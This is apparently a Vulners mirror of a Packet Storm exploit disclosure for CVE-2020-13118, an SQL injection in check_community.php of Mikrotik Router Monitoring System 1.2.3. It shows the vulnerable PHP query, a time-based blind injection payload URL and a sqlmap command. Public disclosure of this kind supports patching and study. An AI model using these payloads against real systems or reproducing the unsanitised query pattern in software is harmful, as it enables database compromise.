Lucene search
K

Mikrotik Router Monitoring System 1.2.3 SQL Injection

🗓️ 16 May 2020 00:00:00Reported by jul10l1r4Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 154 Views

Mikrotik Router Monitoring System 1.2.3 SQL Injection discovered in check_community.ph

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Mikrotik Router Monitoring System 1.2.3 - (community) SQL Injection Vulnerability
19 May 202000:00
zdt
Circl
CVE-2020-13118
24 Oct 202404:32
circl
CVE
CVE-2020-13118
16 May 202019:11
cve
Cvelist
CVE-2020-13118
16 May 202019:11
cvelist
EUVD
EUVD-2020-5394
7 Oct 202500:30
euvd
NVD
CVE-2020-13118
16 May 202020:15
nvd
OSV
CVE-2020-13118
16 May 202020:15
osv
Prion
Sql injection
16 May 202020:15
prion
RedhatCVE
CVE-2020-13118
22 May 202516:15
redhatcve
`# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection  
# Exploit Author: jul10l1r4 (Julio Lira)  
# Google Dork: N/A  
# Date: 2020-05-16  
# Vendor Homepage: https://mikrotik.com  
# Software Link: https://mikrotik.com/download  
# Version: <= 1.2.3  
# Tested on: Debian 10 buster  
# CVE: 2020-13118  
Description: SQL Injection found in check_community.php:49  
  
$community = $_GET['community'];  
$_SESSION['community'] = $community;  
$query = "SELECT name from router where `community`='  
$community'";  
  
PoC:  
  
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI  
  
SQLmap using:  
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 May 2020 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.03672
154